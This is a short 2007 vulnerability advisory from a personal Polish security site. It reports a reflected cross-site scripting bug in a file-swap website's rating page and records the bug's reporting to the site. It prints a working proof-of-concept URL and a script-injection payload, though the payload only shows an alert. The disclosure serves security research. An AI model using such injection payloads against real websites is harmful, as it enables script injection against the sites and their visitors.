Zapraszam na bloga o botnetach i złośliwym oprogramowaniu:
bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety
faq
security
public
art
processing
linux moje
tests
linki
stats
start
kaneda@bohater.net
+
Subject:
XSS bug for www.file-swap.com
+
Version:
2007.06.04
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
www.file-swap.com Description:
Give one file - get one free !
+
Description:
XSS IN:
http://www.file-swap.com/rating.php?filename=tak%22);alert('zupa');%3C/script%3E
Sent data:
");alert('zupa');</script>
Its nothing special, because this site is without any kind of authentication.
Timeline:
2007.06.04 bug discovered
2007.06.04 bug sent via http://www.file-swap.com/info/contact
Original Advisory:
http://kaneda.bohater.net/security/20070604-xss-file-swap.com.php
Check my other bugs in security section:
Security